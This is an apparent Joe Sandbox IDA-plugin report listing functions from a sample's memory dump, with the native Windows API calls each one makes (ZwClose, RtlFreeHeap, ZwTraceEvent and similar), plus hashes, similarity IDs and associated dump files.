Instruction ID: f1e3f7bdc74482cfacfd21055e35f044a0ccfdc1cb307d02d7448c768f82f152
Opcode Fuzzy Hash: a4e27b2292a839cfc8363002103dda0a2f41f5016bd9f671962ce03388386bbf
Instruction Fuzzy Hash: DEF08270A40249ABDB04DBADEA56E9E7BB5EF48700F10009AE905EB2C1EA34DD10C799

Uniqueness

Uniqueness Score: -1.00%

Function 7271878F, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,726B2CD9,?,?,?,?,?,?,7266CED3,?,?), ref: 727187AD
ZwTraceEvent.210A(?,00000402,00000004,?,?,?,?,?,?,?,726B2CD9,?,?,?), ref: 727187DA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: cb669dc411f24c0361e021ef99b56b06a8c38b85dae08feba1bf7fafbda08b4d
Instruction ID: b1741e7ec6a0aaefc49e1681fe84a285a89ca97847e34c2f62c3e07c0f85e8d2
Opcode Fuzzy Hash: cb669dc411f24c0361e021ef99b56b06a8c38b85dae08feba1bf7fafbda08b4d
Instruction Fuzzy Hash: 78F08274A4024AABDB04DBADD686EAE7BB4EF48700F100499F905EB2C1EB34DD10C759

Uniqueness

Uniqueness Score: -1.00%

Function 727014EC, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,726A7019,?,00000000,?,?,727379A0), ref: 7270150A
ZwTraceEvent.210A(?,00000402,00000004,?,?,726A7019,?,00000000,?,?,727379A0), ref: 72701537

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: bf4d9bbd3717e0f48870b842e4489d57bff0f4b54377462e35fe6f170441aae9
Instruction ID: 4b0424ef9ffd99583e3268d8613d2a9f615d9aa0ec1123610ed0c8db8b9e3fb6
Opcode Fuzzy Hash: bf4d9bbd3717e0f48870b842e4489d57bff0f4b54377462e35fe6f170441aae9
Instruction Fuzzy Hash: BAF08271A01248ABDB14CBEDD646A9E7BF4EF09700F501099E906EB2C1EA74DD14C798

Uniqueness

Uniqueness Score: -1.00%

Function 727184CD, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A ref: 727184EB
ZwTraceEvent.210A(?,00000402,00000004,?), ref: 72718518

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 6ecdb22d9c057e668c0a86dcc789310d1a05c837bf4dadf669c70b9b0893830d
Instruction ID: 83ef90368f55e4a389b876a2ef313c02fc28d8f5630bfb1998a818a2007633ac
Opcode Fuzzy Hash: 6ecdb22d9c057e668c0a86dcc789310d1a05c837bf4dadf669c70b9b0893830d
Instruction Fuzzy Hash: E3F08270A40259ABDB04DBADDA45EAEB7B4EF44704F10045AF915EB2C1FA34DD10C799

Uniqueness

Uniqueness Score: -1.00%

Function 7271852B, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A ref: 72718549
ZwTraceEvent.210A(?,00020402,00000004,?), ref: 72718576

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: f10e66c1779b72d9fc44f3573d2dd21ef322487fb9408a23addb7d9c964fddb7
Instruction ID: b724cee64fefa70067ec34c03060466936e5a8ea0bfbcbbab992915752a7a5ab
Opcode Fuzzy Hash: f10e66c1779b72d9fc44f3573d2dd21ef322487fb9408a23addb7d9c964fddb7
Instruction Fuzzy Hash: 5AF08270A40259AFDB04DFACDA45EAEB7B5EF44704F100459B906EB2C1EA34DD10C799

Uniqueness

Uniqueness Score: -1.00%

Function 7265044F, Relevance: 3.0, APIs: 2, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

ZwOpenKey.210A(00000000,00000001,72621088,?,?,72650402,?), ref: 7265046D

Part of subcall function 7268A300: LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

ZwClose.210A(00000000,00000000,00000001,72621088,?,?,72650402,?), ref: 726A7492

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseInitializeOpenThunk
String ID:
API String ID: 1312286342-0
Opcode ID: 5e490da2c0849a035f76c20e5e060829a01e958328a38b5fd477c043012da843
Instruction ID: ac0066ce077e3212797a3fbfa457a7e139b6bd14673d9a1a9a5c1d9d83d3d2b8
Opcode Fuzzy Hash: 5e490da2c0849a035f76c20e5e060829a01e958328a38b5fd477c043012da843
Instruction Fuzzy Hash: 20F02230604259EBDB02EA5ACE01B8E77B9EF44316F2005ABDD0193282EB74CE00D7C2

Uniqueness

Uniqueness Score: -1.00%

Function 726D137B, Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 726D1689: ZwQueryInformationProcess.210A(000000FF,00000007,?,00000004,00000000,?,?,?,726D1391,00000065,00000000,?,726D069E,?,00000000), ref: 726D16A0

ZwRaiseException.210A(?,?,00000000,00000065,00000000,?,726D069E,?,00000000,?,?,?,726FAF6B,00000000,?,00000000), ref: 726D1399
ZwTerminateProcess.210A(000000FF,?,?,?,00000000,00000065,00000000,?,726D069E,?,00000000,?,?,?,726FAF6B,00000000), ref: 726D13AB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Process$ExceptionInformationQueryRaiseTerminate
String ID:
API String ID: 446936932-0
Opcode ID: 54a4ade1153e0de4bb9f4aaebe09018f967457230423009e205bc94a909f24d8
Instruction ID: 127e96b519d1f120546e2fd518e27401b124d0b694b506b1b200128aaa334c80
Opcode Fuzzy Hash: 54a4ade1153e0de4bb9f4aaebe09018f967457230423009e205bc94a909f24d8
Instruction Fuzzy Hash: 95E086B210025D22CF2111BE9D04F5B7DAD4FC27B4F2A5267FD18920D0E9A08441407D

Uniqueness

Uniqueness Score: -1.00%

Function 727180F7, Relevance: 3.0, APIs: 2, Instructions: 26memorynativeCOMMON

Download Yara Rule

APIs

ZwAlpcSendWaitReceivePort.210A(?,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,726B2219,7266CFE9,?,?), ref: 72718111
RtlFreeHeap.210A(?,00000000,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,726B2219,7266CFE9), ref: 72718126

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AlpcFreeHeapPortReceiveSendWait
String ID:
API String ID: 674693165-0
Opcode ID: 3fdd5f5568d4970c49b05140c40f99f9937dd9d60a848e2229312607933ef72b
Instruction ID: aa2261cc54fb80df7730b401fe0d82c2eed777b1997346f3e5622a3166a99b63
Opcode Fuzzy Hash: 3fdd5f5568d4970c49b05140c40f99f9937dd9d60a848e2229312607933ef72b
Instruction Fuzzy Hash: 2EE01D72201455BFDB170A65DC80E62FF6FFB846A4B540036F51482570C762EC71F794

Uniqueness

Uniqueness Score: -1.00%

Function 726DE1B3, Relevance: 3.0, APIs: 2, Instructions: 25nativethreadCOMMON

Download Yara Rule

APIs

ZwOpenThreadTokenEx.210A(000000FE,00000028,00000001,00000200,00000000,?,00000000,00800000,726DB385), ref: 726DE1C8
ZwOpenThreadTokenEx.210A(000000FE,00000028,00000000,00000200,00000000,000000FE,00000028,00000001,00000200,00000000,?,00000000,00800000,726DB385), ref: 726DE1D8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: OpenThreadToken
String ID:
API String ID: 3674800776-0
Opcode ID: e7d4b78a6beab629d426832569290bbd84816422f9a0ac6fa3e90442eab8c292
Instruction ID: 36415b48f6cf6eb777ec7f70fb858234623bc48aac8b5e8beb6811707f7d4d51
Opcode Fuzzy Hash: e7d4b78a6beab629d426832569290bbd84816422f9a0ac6fa3e90442eab8c292
Instruction Fuzzy Hash: E5D09E7624226435FA24105F5C8DF975D5DCBC67F9F35032A7E38961D2A8859C818075

Uniqueness

Uniqueness Score: -1.00%

Function 72715331, Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

ZwSetEvent.210A(?,00000000,?,00000000,00000000,7271550C,00000074,?,?,?), ref: 72715346
ZwWaitForSingleObject.210A(?,00000000,00000000,?,00000000,?,00000000,00000000,7271550C,00000074,?,?,?), ref: 72715350

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: EventObjectSingleWait
String ID:
API String ID: 582559000-0
Opcode ID: 97bf1859057e40c0bd6f50636cb1915cfa030d7c8abaa88f48d9482f8f91282a
Instruction ID: 6dfe08f57d7332d0b58eb17683ca8164cf4441d9f9dbaf7bf2055bafee9b4ac3
Opcode Fuzzy Hash: 97bf1859057e40c0bd6f50636cb1915cfa030d7c8abaa88f48d9482f8f91282a
Instruction Fuzzy Hash: 2EE0E672604916BFE3188E69D8C1D66FA5DFB847757144127B05896510C761AC21CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 726FF722, Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

ZwQueryInformationProcess.210A(000000FF,00000024,00000000,00000004,00000000,00000002,?,72701A7B,?,726FF9AF,00000001,00000020,727358C0), ref: 726FF738
RtlUniform.210A(00000000,000000FF,00000024,00000000,00000004,00000000,00000002,?,72701A7B,?,726FF9AF,00000001,00000020,727358C0), ref: 726FF745

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationProcessQueryUniform
String ID:
API String ID: 4116771627-0
Opcode ID: 886b1d67473c639c640af26c21fed4014efa9c5235223b9622bf2bda24ef2eb8
Instruction ID: e9859bbb0620c6171b21c2eea5c60d36c81fb0d9bf9d84e78b9dffee6c61b16c
Opcode Fuzzy Hash: 886b1d67473c639c640af26c21fed4014efa9c5235223b9622bf2bda24ef2eb8
Instruction Fuzzy Hash: 63E05B7165424CF7EF10C7D99D06F9AB7ACD745738F2002637B24D64C0EA74DB1042A9

Uniqueness

Uniqueness Score: -1.00%

Function 72642416, Relevance: 3.0, APIs: 2, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(00000000,72642402,?,?,?,?,?,?,?,?,?,7271ED40,0000004C), ref: 726A03C2
RtlFreeHeap.210A(?,00000000,?,72642402,?,?,?,?,?,?,?,?,?,7271ED40,0000004C), ref: 726A03D2

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: f8688d5ecb6f5402ddb033d4a5dea10a927741b34952e498de41bb055b868b40
Instruction ID: c6bdc9ddafc20cfe07c86d273864ada08ec27acf9a566c58c341c8f2a7b6e44d
Opcode Fuzzy Hash: f8688d5ecb6f5402ddb033d4a5dea10a927741b34952e498de41bb055b868b40
Instruction Fuzzy Hash: 9FE08C30508855EBCB03AB28C8A0BAABA37FF84308F901016D042225E1CB29ADA4CB94

Uniqueness

Uniqueness Score: -1.00%

Function 726716B3, Relevance: 3.0, APIs: 2, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(?,72671644,00000024,000F00FF,00000000,?,000000FF,7266C8C0,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 726B3E22
ZwClose.210A(?,?,72671644,00000024,000F00FF,00000000,?,000000FF,7266C8C0,00000000,7FFE03C0,?,?,00000028,001F0003,00000000), ref: 726B3E34

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 791a2f720c140e444f1399fdc3cc05ac16f7e85055c2dba40d239c9d29bb1e4a
Instruction ID: d885d5a2d24d8b865b0cf46131f1327f51d93f06b4f3f61c2d2f5022606c6476
Opcode Fuzzy Hash: 791a2f720c140e444f1399fdc3cc05ac16f7e85055c2dba40d239c9d29bb1e4a
Instruction Fuzzy Hash: 09D0A774404F04D9CF224F09D54038A79F26F04718F24072FC54B009F0D739A822EB45

Uniqueness

Uniqueness Score: -1.00%

Function 72649305, Relevance: 3.0, APIs: 2, Instructions: 12nativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(?,?,7264923B,7271F0F8,0000000C,726491E9), ref: 7264930D
ZwClose.210A(?,?,?,7264923B,7271F0F8,0000000C,726491E9), ref: 72649319

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 33fb0187dd7c250182af962299fea06c6a7259da0ec6fe14876d47724720d011
Instruction ID: 5230269181c4412c8ce2887b78e2e1854226429784992848786926a9490b04bb
Opcode Fuzzy Hash: 33fb0187dd7c250182af962299fea06c6a7259da0ec6fe14876d47724720d011
Instruction Fuzzy Hash: BBD0C932414B109FD7715F14E549752BAF1BF40337F250E0E9493018A187B9FC58EA9A

Uniqueness

Uniqueness Score: -1.00%

Function 7268C350, Relevance: 3.0, APIs: 2, Instructions: 10nativeCOMMON

Download Yara Rule

APIs

RtlUnhandledExceptionFilter.210A(?,?,7268C4CB,72621650,72735DD8,?,7268C466,00000008,?,726A0280,?,?,?,?,?,?), ref: 7268C358

Part of subcall function 726FAF90: RtlUnhandledExceptionFilter2.210A(?,72624832,?,?,7268C44A,72621650,7268C327,7268C327,?,7269DE96,7264B16E,7271F198,00000090,7264B0FE,00000003,7268C327), ref: 726FAF9E

ZwTerminateProcess.210A(000000FF,C0000409,?,?,7268C4CB,72621650,72735DD8,?,7268C466,00000008,?,726A0280,?,?,?,?), ref: 7268C364

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExceptionUnhandled$FilterFilter2ProcessTerminate
String ID:
API String ID: 1586208841-0
Opcode ID: 6c61231e124b7605ba009abc2da3bd17c5223b39537e1fdf7973b731f8652269
Instruction ID: f97aa1865e7a3cd5f5762d1d0ec93cbdbfa3d4f16e5ef1a037d09ab73e66fa96
Opcode Fuzzy Hash: 6c61231e124b7605ba009abc2da3bd17c5223b39537e1fdf7973b731f8652269
Instruction Fuzzy Hash: 78B092720082483ACE012A9A9D04C093E098BC1378B268312BA3C2A0E69932EC92409D

Uniqueness

Uniqueness Score: -1.00%

Function 726FE1FF, Relevance: 1.8, APIs: 1, Instructions: 260COMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,72692500,?,?,?,726FECA5,?,?,00000000,?,?,00000001,?,00000200,?,?), ref: 726FE28A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitStringUnicode
String ID:
API String ID: 4228678080-0
Opcode ID: 5c4bcb7bd5ae4141907561fd6dff9c1ffa19dc71c2e6cd419f3a1b32a4622eac
Instruction ID: 5235bca199ae4c41b0ebb507a9cb9f6aabf307b001f170676d9cb89e0a0c840f
Opcode Fuzzy Hash: 5c4bcb7bd5ae4141907561fd6dff9c1ffa19dc71c2e6cd419f3a1b32a4622eac
Instruction Fuzzy Hash: 6BA18D3AE01299DBCF25DFA8D5406EEBBB6FF59714F04402ED842A7384E7309946CB64

Uniqueness

Uniqueness Score: -1.00%

Function 7264E4F4, Relevance: 1.7, APIs: 1, Instructions: 237nativeCOMMON

Download Yara Rule

APIs

ZwEnumerateValueKey.210A(?,00000000,00000001,?,00000200,?,?,00000000), ref: 7264E57F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: EnumerateValue
String ID:
API String ID: 1749906896-0
Opcode ID: 49d7c6608853f4c8317c975001fa84b451b56dc1ffcdc85eba61ff6be1fed7cd
Instruction ID: 155a5a92aae74748f5a5b54ddf47bdc2fce54ba8385d7164f36c1bc25cb1ac06
Opcode Fuzzy Hash: 49d7c6608853f4c8317c975001fa84b451b56dc1ffcdc85eba61ff6be1fed7cd
Instruction Fuzzy Hash: E9918C75E012699BCB299F6CCC587D9B7B5EF48714F1102EAD809A7280EB349F81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 72667640, Relevance: 1.7, APIs: 1, Instructions: 481COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,?,?,00000001,00000001,?), ref: 72667727

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 3c02f6df6a936703dc538476888f04e346892cda4f730654198d28f37d36ad78
Instruction ID: 15da116191c69e6170e0626560b9b5c9c4a53a5a021d87a888306303f24d2abf
Opcode Fuzzy Hash: 3c02f6df6a936703dc538476888f04e346892cda4f730654198d28f37d36ad78
Instruction Fuzzy Hash: 4C026A70D142598BDB1ACF9DC4906BDBBB2EF49704F21412FE856AB2D4E7709C92CB81

Uniqueness

Uniqueness Score: -1.00%

Function 72671070, Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.210A ref: 726B3C77

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 71ca42bd4986eb80b50aed9da5dad16f0a41fff975c5c155e1f56648cd8f09c8
Instruction ID: 7ff5e845e94c8c2165b913938a1acfca2a5b582f48f5c592a8f572d1e83955e3
Opcode Fuzzy Hash: 71ca42bd4986eb80b50aed9da5dad16f0a41fff975c5c155e1f56648cd8f09c8
Instruction Fuzzy Hash: 536125707046519FD3198A2EC940732B7F6AF84705F20859BE8938F6C9DB38E4A5CB60

Uniqueness

Uniqueness Score: -1.00%

Function 727050B3, Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18dd0a09e6964b75d0400d213c101723e4bf14337862bfcfcd489c1cca3f0da0
Instruction ID: d7c0a1b904bd1311b3cacdf5af5d4ca4aec1d5a7798f2a659b4ba5d513c28157
Opcode Fuzzy Hash: 18dd0a09e6964b75d0400d213c101723e4bf14337862bfcfcd489c1cca3f0da0
Instruction Fuzzy Hash: C081AF75A00206DFCB09CFA8C980AAEBBF2FF88310F148669D815DB345D734EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7267D499, Relevance: 1.7, APIs: 1, Instructions: 161nativethreadCOMMON

Download Yara Rule

APIs

ZwAlertThreadByThreadId.210A(FFFFFFFE,?,FFFFFFFE,FFFFFFFE), ref: 7267D5BB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Thread$Alert
String ID:
API String ID: 2775339012-0
Opcode ID: b4fa3894ce4ddc29c9f45a4d0a29522d77da8a4705a0993785b96167d592a320
Instruction ID: 482946e7689bab90d14218700c03b29f95e16bad32af75110d65f79305d00251
Opcode Fuzzy Hash: b4fa3894ce4ddc29c9f45a4d0a29522d77da8a4705a0993785b96167d592a320
Instruction Fuzzy Hash: 7A51E0716043128FD71ACE2DD580706B7F2BF84218F248A6EE99ACB385D734D946CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 7267D76B, Relevance: 1.7, APIs: 1, Instructions: 159nativethreadCOMMON

Download Yara Rule

APIs

ZwWaitForAlertByThreadId.210A(?,00000000,0000000A,-00000001,00000000,?,?,00000000,?,?,?,?,72642E59,00000004,?,00000000), ref: 726BAAE6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
